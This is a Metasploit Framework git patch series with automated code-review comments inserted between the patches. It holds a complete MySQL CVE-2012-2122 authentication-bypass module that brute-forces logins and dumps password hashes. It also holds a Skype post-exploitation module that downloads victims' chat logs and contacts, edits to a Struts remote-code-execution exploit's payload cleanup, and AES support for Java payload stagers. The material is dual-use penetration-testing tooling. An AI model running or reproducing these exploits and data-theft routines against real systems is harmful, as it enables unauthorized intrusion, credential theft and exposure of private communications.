@@ -2422,6 +2423,9 @@ class DBManager if (firstline.index(" attrs["IPAddress"], + :name => attrs["HostName"], + :workspace => @args[:wspace] + } + thost[:host] = attrs["IPAddress"] + thost[:name] = attrs["HostName"] + @host = db_report(:host, thost) + when "OS" + @state[:has_text] = true + when "Port" + @service = { + :host => @host, + :port => attrs["Number"], + :state => "open" + } + when "Service" + @state[:has_text] = true + when "Protocol" + @state[:has_text] = true + when "Exposure" + @vuln = { + :host => @host, + :refs => [] + } + when "Title" + @state[:has_text] = true + when "Description" + @state[:has_text] = true + when "CVE" + @state[:has_text] = true + when "References" + @state[:has_text] = true + end + end + + def end_element(name=nil) + unless in_tag("JobOrder") + case name + when "OS" + unless @host.nil? + tnote = { + :type => "host.os.fusionvm_fingerprint", + :data => { :os => @text.strip }, + :host => @host, + :workspace => @args[:wspace] + } + db_report(:note, tnote) + @host.normalize_os + end + when "IPAdress" + @host = nil + when "Service" + @service[:name] = @text.strip + when "Protocol" + @service[:proto] = @text.strip.downcase + when "Port" + db_report(:service, @service) + when "Exposure" + db_report(:vuln, @vuln) + when "Title" + @vuln[:name] = @text.strip + when "Description" + @vuln[:info] = @text.strip + when "CVE" + @vuln[:refs] << "CVE-#{@text.strip}" + when "References" + unless @text.blank? + @text.split(' ').each do |ref| + next unless ref.start_with? "http" + if ref =~ /MS\d{2}-\d{3}/ + @vuln[:refs] << "MSB-#{$&}" + else + @vuln[:refs] << "URL-#{ref.strip}" + end + end + end + end + end + @text = nil + @state[:current_tag].delete name + end + + + +end +end +end \ No newline at end of file From a20c85a655f563ab1ec809a135d4f95004af08e4 Mon Sep 17 00:00:00 2001 From: David Maloney Date: Sun, 10 Jun 2012 17:01:31 -0500 Subject: [PATCH 09/18] Remove binding.pry call --- lib/msf/core/db.rb | 1 - 1 file changed, 1 deletion(-) 
diff --git a/lib/msf/core/db.rb b/lib/msf/core/db.rb index 9d53dcb299..2f882703c9 100644 --- a/lib/msf/core/db.rb +++ b/lib/msf/core/db.rb @@ -4403,7 +4403,6 @@ class DBManager noko_args = args.dup noko_args[:blacklist] = bl noko_args[:wspace] = wspace - binding.pry if block yield(:parser, "Nokogiri v#{::Nokogiri::VERSION}") import_nmap_noko_stream(noko_args) {|type, data| yield type,data } From fc0dc23752a11c61c484bce03f37e0cdd13a889c Mon Sep 17 00:00:00 2001 From: David Maloney Date: Sun, 10 Jun 2012 17:04:47 -0500 Subject: [PATCH 10/18] Some handling around empty elements --- lib/rex/parser/fusionvm_nokogiri.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/rex/parser/fusionvm_nokogiri.rb b/lib/rex/parser/fusionvm_nokogiri.rb index 12a729ce48..b0cd12ff57 100644 --- a/lib/rex/parser/fusionvm_nokogiri.rb +++ b/lib/rex/parser/fusionvm_nokogiri.rb @@ -58,7 +58,7 @@ module Parser unless in_tag("JobOrder") case name when "OS" - unless @host.nil? + unless @host.nil? or @text.blank? tnote = { :type => "host.os.fusionvm_fingerprint", :data => { :os => @text.strip }, From bb80124d63ca67484c1e96cd940afe39c6a5bb1e Mon Sep 17 00:00:00 2001 From: Carlos Perez Date: Sun, 10 Jun 2012 21:59:14 -0400 Subject: [PATCH 11/18] Added support for shell and tested on OSX 10.6 and 10.7. Added additional session type checks. --- modules/post/multi/gather/skype_enum.rb | 92 ++++++++++++++++++------- 1 file changed, 67 insertions(+), 25 deletions(-) diff --git a/modules/post/multi/gather/skype_enum.rb b/modules/post/multi/gather/skype_enum.rb index 4280effac0..4edb2276b0 100644 --- a/modules/post/multi/gather/skype_enum.rb +++ b/modules/post/multi/gather/skype_enum.rb 
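Review bot: `unless @host.nil? or @text.blank?` uses `or` in a boolean condition; `||` is the conventional form here, `unless @host.nil? || @text.blank?`, and avoids the precedence surprises `or` brings once the condition is extended. The other end_element branches that call `@text.strip` directly (Service, Protocol, Title, Description, CVE) get no such guard, so the empty-element failure this hunk fixes for OS remains possible there — those lines are outside this hunk. `blank?` also appears to depend on ActiveSupport being loaded by the framework rather than by the parser itself; worth a one-line comment if that assumption is intended.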
@@ -42,8 +42,13 @@ class Metasploit3 < Msf::Post 'Author' => [ 'Carlos Perez '], 'Version' => '$Revision$', 'Platform' => [ 'windows', 'osx' ], - 'SessionTypes' => [ 'meterpreter' ] + 'SessionTypes' => [ 'meterpreter', 'shell' ] )) + register_advanced_options( + [ + # Set as an advanced option since it can only be useful in shell sessions. + OptInt.new('TIMEOUT', [true ,'Timeout in seconds when downloading main.db on a shell session.', 90]), + ], self.class) end # Run Method for when run command is issued 
@@ -58,30 +63,48 @@ class Metasploit3 < Msf::Post print_error("Failed to load sqlite3, try 'gem install sqlite3'") return end - - if sysinfo['OS']=~ /Mac OS X/ - # Iterate thru each user profile on as OSX System for users not in the default install - users = get_nonsystem_accounts.collect {|p| if p['uid'].to_i > 500; p; end }.compact - users.each do |p| - if check_skype("#{p['dir']}/Library/Application Support/", p['name']) - db_in_loot = download_db(p) - process_db(db_in_loot,p['name']) + + if (session.platform =~ /java/) || (session.platform =~ /osx/) + # Make sure a Java Meterpreter on anything but OSX will exit + if session.platform =~ /java/ and sysinfo['OS'] !~ /Mac OS X/ + print_error("This session type and platform are not supported.") + return end - end - else - # Iterate thru each user profile in a Windows System using Meterpreter Post API - grab_user_profiles().each do |p| - if check_skype(p['AppData'],p['UserName']) - db_in_loot = download_db(p) - process_db(db_in_loot,p['UserName']) + # Iterate thru each user profile on as OSX System for users not in the default install + users = get_users.collect {|p| if p['uid'].to_i > 500; p; end }.compact + users.each do |p| + if check_skype("#{p['dir']}/Library/Application Support/", p['name']) + db_in_loot = download_db(p) + # Exit if file was not successfully downloaded + return if db_in_loot.nil? + process_db(db_in_loot,p['name']) + end end + elsif (session.platfom =~ /win/ and session.type =~ /meter/) + # Iterate thru each user profile in a Windows System using Meterpreter Post API + grab_user_profiles().each do |p| + if check_skype(p['AppData'],p['UserName']) + db_in_loot = download_db(p) + process_db(db_in_loot,p['UserName']) + end + end + else + print_error("This session type and platform are not supported.") end - end + end # Check if Skype is installed. Returns true or false. 
def check_skype(path, user) - session.fs.dir.foreach(path) do |dir| + dirs = [] + if session.type =~ /meterpreter/ + session.fs.dir.foreach(path) do |d| + dirs << d + end + else + dirs = cmd_exec("ls -m \"#{path}\"").split(", ") + end + dirs.each do |dir| if dir =~ /Skype/ print_good("Skype account found for #{user}") return true @@ -93,10 +116,14 @@ class Metasploit3 < Msf::Post # Download file using Meterpreter functionality and returns path in loot for the file def download_db(profile) - if sysinfo['OS'] =~ /Mac OS X/ - file = session.fs.file.search("#{profile['dir']}///Library/Application Support/Skype/","main.db",true) + if session.type =~ /meterpreter/ + if sysinfo['OS'] =~ /Mac OS X/ + file = session.fs.file.search("#{profile['dir']}/Library/Application Support/Skype/","main.db",true) + else + file = session.fs.file.search("#{profile['AppData']}\\Skype","main.db",true) + end else - file = session.fs.file.search("#{profile['AppData']}\\Skype","main.db",true) + file = cmd_exec("mdfind","-onlyin #{profile['dir']} -name main.db").split("\n").collect {|p| if p =~ /Skype\/\w*\/main.db$/; p; end }.compact end file_loc = store_loot("skype.config", 
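Review bot: The Windows branch in run tests `session.platfom` (missing `r`), so on a Windows Meterpreter session the `elsif` raises NoMethodError before the profile loop is reached; it should read `elsif session.platform =~ /win/ && session.type =~ /meter/`. In the OSX loop, `return if db_in_loot.nil?` aborts the whole run when one user's database fails to download, whereas `next if db_in_loot.nil?` would carry on with the remaining users. The user filter `get_users.collect {|p| if p['uid'].to_i > 500; p; end }.compact` is a `select` in disguise: `users = get_users.select { |p| p['uid'].to_i > 500 }`. The check_skype method that begins at the end of this hunk continues outside it.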
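Review bot: In the shell branch of download_db the `-onlyin #{profile['dir']}` argument to mdfind is unquoted, so a home directory containing a space is split into several arguments and the search silently finds nothing; quoting it and replacing the `collect`/`compact` pair gives `file = cmd_exec("mdfind", "-onlyin \"#{profile['dir']}\" -name main.db").split("\n").grep(%r{Skype/\w*/main\.db$})`. After this change `file` holds hashes on Meterpreter sessions and plain strings on shell sessions, which deserves a one-line comment above `if session.type =~ /meterpreter/` since every consumer of `file` must branch on it. The store_loot call that starts at the end of this hunk continues outside it.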
@@ -107,12 +134,27 @@ class Metasploit3 < Msf::Post ) file.each do |db| - maindb = "#{db['path']}#{session.fs.file.separator}#{db['name']}" - print_status("Downloading #{maindb}") - session.fs.file.download_file(file_loc,maindb) + if session.type =~ /meterpreter/ + maindb = "#{db['path']}#{session.fs.file.separator}#{db['name']}" + print_status("Downloading #{maindb}") + session.fs.file.download_file(file_loc,maindb) + else + print_status("Downloading #{db}") + # Giving it 1:30 minutes to download since the file could be several MB + maindb = cmd_exec("cat", "\"#{db}\"", datastore['TIMEOUT']) + if maindb.nil? + print_error("Could not download the file. Set the TIMEOUT option to a higher number.") + return + end + # Saving the content as binary so it can be used + output = ::File.open(file_loc, "wb") + maindb.each_line do |d| + output.puts(d) + end + output.close + end print_good("Configuration database saved to #{file_loc}") end - return file_loc end From d226d80919cc84aec799d344e43a58138c62d0a1 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Mon, 11 Jun 2012 01:34:18 -0500 Subject: [PATCH 12/18] Make msftidy happy --- modules/post/multi/gather/skype_enum.rb | 26 ++++++++++++------------- 1 file changed, 13 insertions(+), 13 deletions(-) diff --git a/modules/post/multi/gather/skype_enum.rb b/modules/post/multi/gather/skype_enum.rb index 4edb2276b0..4063ce464d 100644 --- a/modules/post/multi/gather/skype_enum.rb +++ b/modules/post/multi/gather/skype_enum.rb @@ -6,7 +6,7 @@ # ## This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ +# http://metasploit.com/framework/ ## require 'msf/core' 
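Review bot: The shell-session write in download_db opens `file_loc` without a block and copies the content line by line with `puts`, which appends a newline to the final chunk when the `cat` output does not end in one and leaves the handle open if anything raises in between; `::File.open(file_loc, "wb") { |f| f.write(maindb) }` replaces the five lines from `output = ::File.open(file_loc, "wb")` to `output.close`. The `maindb.nil?` guard only helps if `cmd_exec` returns nil on timeout; if it returns an empty string instead, `if maindb.nil? || maindb.empty?` is the check that actually catches a failed download. Pulling a binary SQLite file through `cat` on a shell channel presumably relies on the channel passing bytes through untouched, which is worth a comment at that line. The early `return` inside `file.each` makes download_db return nil, which the OSX path in run already handles.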
@@ -26,11 +26,11 @@ class Metasploit3 < Msf::Post include Msf::Post::Common include Msf::Post::File include Msf::Post::Windows::UserProfiles - + include Msf::Post::OSX::System - - + + def initialize(info={}) super( update_info( info, 'Name' => 'Multi Gather Skype User Data Enumeration', @@ -55,7 +55,7 @@ class Metasploit3 < Msf::Post def run # syinfo is only on meterpreter sessions print_status("Running module for Skype enumeration against #{sysinfo['Computer']}") if not sysinfo.nil? - + # Ensure that SQLite3 gem is installed begin require 'sqlite3' @@ -63,7 +63,7 @@ class Metasploit3 < Msf::Post print_error("Failed to load sqlite3, try 'gem install sqlite3'") return end - + if (session.platform =~ /java/) || (session.platform =~ /osx/) # Make sure a Java Meterpreter on anything but OSX will exit if session.platform =~ /java/ and sysinfo['OS'] !~ /Mac OS X/ @@ -91,7 +91,7 @@ class Metasploit3 < Msf::Post else print_error("This session type and platform are not supported.") end - + end # Check if Skype is installed. Returns true or false. @@ -125,7 +125,7 @@ class Metasploit3 < Msf::Post else file = cmd_exec("mdfind","-onlyin #{profile['dir']} -name main.db").split("\n").collect {|p| if p =~ /Skype\/\w*\/main.db$/; p; end }.compact end - + file_loc = store_loot("skype.config", "binary/db", session, @@ -191,7 +191,7 @@ class Metasploit3 < Msf::Post # Check if an account exists and if it does enumerate if not exit. if user_rows.length > 1 user_info = store_loot("skype.accounts", - "text/plain", + "text/plain", session, "", "skype_accounts.csv", 
@@ -203,14 +203,14 @@ class Metasploit3 < Msf::Post print_error("No skype accounts are configured for #{user}") return end - + # Extract chat log from the database print_status("Extracting chat message log") cl_rows = db.execute2('SELECT "chatname", "convo_id", "author", "dialog_partner", datetime("timestamp","unixepoch"), "body_xml", "remote_id" FROM "Messages" WHERE type == 61;') chat_log = store_loot("skype.chat", - "text/plain", + "text/plain", session, "", "skype_chatlog.csv", @@ -226,7 +226,7 @@ class Metasploit3 < Msf::Post # Extract file transfer history print_status("Extracting file transfer history") - ft_rows = db.execute2('SELECT "partner_handle", "partner_dispname", + ft_rows = db.execute2('SELECT "partner_handle", "partner_dispname", datetime("starttime","unixepoch"), datetime("finishtime","unixepoch"), "filepath", "filename", "filesize", "bytestransferred", "convo_id", datetime("accepttime","unixepoch") FROM "Transfers";') @@ -315,4 +315,4 @@ class Metasploit3 < Msf::Post save_csv(ct_rows, contact_log) end end -end \ No newline at end of file +end From 59f591ac46bfc33cd9f35c7be8e636de1c4cf2e7 Mon Sep 17 00:00:00 2001 From: HD Moore Date: Mon, 11 Jun 2012 01:41:14 -0500 Subject: [PATCH 13/18] Adds jcran's MySQL bruteforce and dump module for CVE-2012-2122 --- .../mysql/mysql_authbypass_hashdump.rb | 218 ++++++++++++++++++ 1 file changed, 218 insertions(+) create mode 100644 modules/auxiliary/scanner/mysql/mysql_authbypass_hashdump.rb diff --git a/modules/auxiliary/scanner/mysql/mysql_authbypass_hashdump.rb b/modules/auxiliary/scanner/mysql/mysql_authbypass_hashdump.rb new file mode 100644 index 0000000000..581b77d9e3 --- /dev/null +++ b/modules/auxiliary/scanner/mysql/mysql_authbypass_hashdump.rb 
@@ -0,0 +1,218 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::MYSQL + include Msf::Auxiliary::Report + + include Msf::Auxiliary::Scanner + + def initialize + super( + 'Name' => 'MYSQL CVE-2012-2122 Authentication Bypass Password Dump', + 'Version' => '$Revision$', + 'Description' => %Q{ + This module exploits a password bypass vulnerability in MySQL in order + to extract the usernames and encrypted password hashes from a MySQL server. + These hashes ares stored as loot for later cracking. + }, + 'Authors' => [ + 'TheLightCosine ', # Original hashdump module + 'jcran' # Authentication bypass bruteforce implementation + ], + 'References' => [ + ['CVE', '2012-2122'] + ], + 'DisclosureDate' => 'Jun 09 2012', + 'License' => MSF_LICENSE + ) + + deregister_options('PASSWORD') + end + + + def run_host(ip) + + # Keep track of results (successful connections) + results = [] + + # Username and password placeholders + username = datastore['USERNAME'] + password = Rex::Text.rand_text_alpha(rand(8)+1) + + # Do an initial check to see if we can log into the server at all + begin + socket = connect(false) + x = ::RbMysql.connect({ + :host => rhost, + :port => rport, + :user => username, + :password => password, + :read_timeout => 300, + :write_timeout => 300, + :socket => socket + }) + x.connect + results << x + + print_good "#{rhost}:#{rport} The server accepted our first login as #{username} with a bad password" + + rescue RbMysql::HostNotPrivileged + print_error "#{rhost}:#{rport} Unable to login from this host due to policy (may still be vulnerable)" + return + rescue RbMysql::AccessDeniedError + print_good "#{rhost}:#{rport} The server allows logins, proceeding with 
bypass test" + rescue ::Interrupt + raise $! + rescue ::Exception => e + print_error "#{rhost}:#{rport} Error: #{e}" + return + end + + # Short circuit if we already won + if results.length > 0 + @mysql_handle = results.first + return dump_hashes + end + + + # + # Threaded login checker + # + max_threads = 16 + cur_threads = [] + + # Try up to 1000 times just to be sure + queue = [*(1 .. 1000)] + + while(queue.length > 0) + while(cur_threads.length < max_threads) + + # We can stop if we get a valid login + break if results.length > 0 + + # keep track of how many attempts we've made + item = queue.shift + + # We can stop if we reach 1000 tries + break if not item + + + # Status indicator + print_status "#{rhost}:#{rport} Authentication bypass is #{item/10}% complete" if (item % 100) == 0 + + t = Thread.new(item) do |count| + begin + # Create our socket and make the connection + s = connect(false) + x = ::RbMysql.connect({ + :host => rhost, + :port => rport, + :user => username, + :password => password, + :read_timeout => 300, + :write_timeout => 300, + :socket => s, + :db => nil + }) + print_status "#{rhost}:#{rport} Successfully bypassed authentication after #{count} attempts" + results << x + rescue RbMysql::AccessDeniedError + rescue Exception => e + print_status "#{rhost}:#{rport} Thread #{count}] caught an unhandled exception: #{e}" + end + end + + cur_threads << t + + end + + # We can stop if we get a valid login + break if results.length > 0 + + # Add to a list of dead threads if we're finished + cur_threads.each_index do |ti| + t = cur_threads[ti] + if not t.alive? 
+ cur_threads[ti] = nil + end + end + + # Remove any dead threads from the set + cur_threads.delete(nil) + + ::IO.select(nil, nil, nil, 0.25) + end + + # Clean up any remaining threads + cur_threads.each {|x| x.kill } + + + if results.length > 0 + print_good("#{rhost}:#{rport} Successful exploited the authentication bypass flaw, dumping hashes...") + @mysql_handle = results.first + return dump_hashes + end + + print_error("#{rhost}:#{rport} Unable to bypass authentication, this target may not be vulnerable") + end + + def dump_hashes + + # Grabs the username and password hashes and stores them as loot + res = mysql_query("SELECT user,password from mysql.user") + if res.nil? + print_error("#{rhost}:#{rport} There was an error reading the MySQL User Table") + return + + end + + # Create a table to store data + tbl = Rex::Ui::Text::Table.new( + 'Header' => 'MysQL Server Hashes', + 'Indent' => 1, + 'Columns' => ['Username', 'Hash'] + ) + + if res.size > 0 + res.each do |row| + next unless (row[0].to_s + row[1].to_s).length > 0 + tbl << [row[0], row[1]] + print_good("#{rhost}:#{rport} Saving HashString as Loot: #{row[0]}:#{row[1]}") + end + end + + this_service = nil + if framework.db and framework.db.active + this_service = report_service( + :host => rhost, + :port => rport, + :name => 'mysql', + :proto => 'tcp' + ) + end + + report_hashes(tbl.to_csv, this_service) unless tbl.rows.empty? + + end + + # Stores the Hash Table as Loot for Later Cracking + def report_hashes(hash_loot,service) + filename= "#{rhost}-#{rport}_mysqlhashes.txt" + path = store_loot("mysql.hashes", "text/plain", rhost, hash_loot, filename, "MySQL Hashes", service) + print_status("#{rhost}:#{rport} Hash Table has been saved: #{path}") + + end + +end From 02a5dff51f71a5930741bfbbddb09b4e6a9257fb Mon Sep 17 00:00:00 2001 
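Review bot: The module info hash uses the key `'Authors'`, while every other module on this page (including the skype module in the same series) uses `'Author'`; if the framework only reads `'Author'`, both credits are silently dropped, so the key should be `'Author' => [`. The per-thread `rescue Exception => e` swallows `Interrupt` and other non-StandardError exceptions inside the login threads, whereas the initial probe above re-raises `::Interrupt` first; a plain `rescue => e` keeps the same coverage for RbMysql errors without that. The status message in that rescue has an unmatched bracket (`Thread #{count}]`), and the later `print_good` string `Successful exploited` should read `Successfully exploited`. Connections opened by threads that succeed after the first are appended to `results` but never closed, since only `results.first` is used.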
From: jvazquez-r7 Date: Mon, 11 Jun 2012 12:07:38 +0200 Subject: [PATCH 14/18] struts_code_exec_exception_delegator_on_new_session: on_new_session modified --- .../struts_code_exec_exception_delegator.rb | 23 ++++++++++++++----- 1 file changed, 17 insertions(+), 6 deletions(-) diff --git a/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb b/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb index ad013800aa..cd732eb105 100644 --- a/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb +++ b/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb @@ -167,13 +167,24 @@ class Metasploit3 < Msf::Exploit::Remote end def on_new_session(client) - if target['Platform'] == 'linux' - print_status("Deleting #{@payload_exe} payload file") - execute_command("/bin/sh@-c@rm #{@payload_exe}") - else - print_status("Windows does not allow running executables to be deleted") - print_status("Delete the #{@payload_exe} file manually after migrating") + + if client.type != "meterpreter" + print_error("Please use a meterpreter payload in order to automatically cleanup.") + print_error("The #{@payload_exe} file must be removed manually.") + return end + + client.core.use("stdapi") if not client.ext.aliases.include?("stdapi") + + if client.sys.config.sysinfo["OS"] =~ /Windows/ + print_error("Windows does not allow running executables to be deleted") + print_error("The #{@payload_exe} file must be removed manually after migrating") + return + end + + print_status("Deleting the #{@payload_exe} file") + client.fs.file.rm(@payload_exe) + end def exploit From 34ecc7fd184b8db9fd300998733fc44014d62f75 Mon Sep 17 00:00:00 2001 
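Review bot: `client.fs.file.rm(@payload_exe)` at the end of on_new_session is not guarded, so a failure to delete the file (for example a permissions error) raises out of the session callback instead of being reported as the manual-cleanup case the two earlier `print_error` branches already handle. Wrapping the call reports the failure and keeps the session usable. Style: `client.core.use("stdapi") if not client.ext.aliases.include?("stdapi")` reads better as `client.core.use("stdapi") unless client.ext.aliases.include?("stdapi")`.
```ruby
    print_status("Deleting the #{@payload_exe} file")
    begin
      client.fs.file.rm(@payload_exe)
    rescue StandardError => e
      print_error("Could not delete #{@payload_exe}, remove it manually: #{e.message}")
    end
```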
From: Michael Schierl Date: Mon, 11 Jun 2012 16:13:25 -0500 Subject: [PATCH 15/18] Adding @schierlm 's AES encryption for Java Tested with and without AES, works as advertised. Set an AESPassword, get encryptification. Score. Squashed commit of the following: commit cca6c5c36ca51d585b8d2fd0840ba34776bc0668 Author: Michael Schierl Date: Wed Apr 4 00:45:24 2012 +0200 Do not break other architectures even when using `setg AESPassword` commit 422d1e341b3865b02591d4c135427903c8da8ac5 Author: Michael Schierl Date: Tue Apr 3 21:50:42 2012 +0200 binaries commit 27368b5675222cc1730ac22e4b7a387b88d0d2b3 Author: Michael Schierl Date: Tue Apr 3 21:49:10 2012 +0200 Add AES support to Java stager This is compatible to the AES mode of the JavaPayload project. I'm pretty sure the way I did it in the handlers (Rex::Socket::tcp_socket_pair()) is not the supposed way, but it works :-) --- data/java/metasploit/AESEncryption.class | Bin 0 -> 1462 bytes data/java/metasploit/Payload.class | Bin 8909 -> 9409 bytes .../src/metasploit/AESEncryption.java | 42 +++++++++++++++ .../javapayload/src/metasploit/Payload.java | 12 +++++ lib/msf/core/handler/bind_tcp.rb | 49 +++++++++++++++++- lib/msf/core/handler/reverse_tcp.rb | 47 ++++++++++++++++- modules/payloads/stagers/java/bind_tcp.rb | 10 ++++ modules/payloads/stagers/java/reverse_tcp.rb | 10 ++++ 8 files changed, 168 insertions(+), 2 deletions(-) create mode 100644 data/java/metasploit/AESEncryption.class create mode 100644 external/source/javapayload/src/metasploit/AESEncryption.java 
diff --git a/data/java/metasploit/AESEncryption.class b/data/java/metasploit/AESEncryption.class new file mode 100644 index 0000000000000000000000000000000000000000..11e0a959a1e347fbd7b1ab932a6aafef160030d2 GIT binary patch literal 1462 zcmZ`(>2lIg6#i~YxFL<&Vzo`xYF)vKabLi#t3~Z%af@}FiEyQHXkf@i%R@P%e?Ucj z03XWn+|VM$%8!%eobT-4;n(kPKhcjAUKtp{Nsdzn`fyr_GaLy68cr&aG;kJ^N}N-+ zl#cTTY+NvK5tr24WgS-xT*Wnx>pE^27{X1Cw1Ht{l>QdSZH_wzMsb(po`Eq;aZEEr zZ+X5a?=bWylFt|-Gv$I{82C_iD>+#e?nc0{nt1fieec>{+0Ocvnrs^~9p!RO_G(M6 zU$hD5`Nd3ft&I$I%WvL^yv#5dbDMclkzUykIA%;7!8pUncAi;Rx?Q=HdDg@n<{8F9 zOd#^LsweAqPQ8d#*DsVeOx(u;N7lpxESPwRaTAZQK+P@AUgcOcv4mxg6%&uKY9fax z4DqSCoINu?eZyWVuegN*Rm|~JA!!^(Rjy4tU#(YU*$yfqukuxed?@NU`l86>uBv;^ zF!3)q`+mi(x*I}@s)8#Z)%5}n!(iA(*Gw43cLbR6D(j-!GlZADHMLRQ8&FBs7)B|p z8&pbVPuf)DoF6tp<7U|ZH+5$T+fpr9Cs!3}zE&#L84iUmolP!^AaILf)+>sDQVkS^%=&?J{XF?! z+^TK|vD&=aJpfUxYs76TGUya^tMEu7xuy=Fu$3>W8c~{XJe{St2h5QCZvj0}N<2cL zx;Vdm2kO4mwK2R-WP55SLTw#Xr=5^)Q>9{=Cb+(_gGjwlB4y_YGHM&C-Ip0A?X6eg z&;P}D@2{QbUk6O!F#TbvUmq9|Zk*&%`Wm7qqo;PZ3HDjp5yLTp_l4%K;4nz{v4uW| zApJ|J1|rW}(3~cs>B!*VcRj6H5ld@;Pb#TTHV_Nd(UcW!z=#igfqAZhJq_$l^Z33m z7)g#%Vp=aGx((5OV8rQfVbn=ku_mmXL*d4p UNlS0yQ0`OM#&MDn>g@#Z2Z{`Yz5oCK literal 0 HcmV?d00001 
diff --git a/data/java/metasploit/Payload.class b/data/java/metasploit/Payload.class index c8bc897506b6a4d28febbe0324bb2401f67d92c4..73a5dc55f4d78439fc0c599266e0a912726485e0 100755 GIT binary patch delta 4494 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 delta 4014 zcmZ8k34BvU6Q9`}Z}Yls(^mpM+5#e%Ne@6M5H2~27AQrE)F=v}jZi3UZNue3P!Ysi zA07n}L^LWM&}v!@;0<1Qfua`g6H&Ys^%K6Cr1aY=h)5-n24zIvb4gSzUgQG534u4AcODFvw4gS_a!BJjz zOotJ0oJ<6X$XZCW(G1#YAv$z)q9#$Y;gYCJOwl0+l@5^{Ow}-rt#pZQ(!6I5X0R}5 zBh1vX6M7_eW=|J3PLgO!?8?cqbj-#a+8w*G*?N@`&-anoS7JX6 zPt{=vdO6xhqX=p`=3<_P`4S6wzy1;juxp@>r{N$LgB_6g(caLp5QlK?q3tfHBusD^ 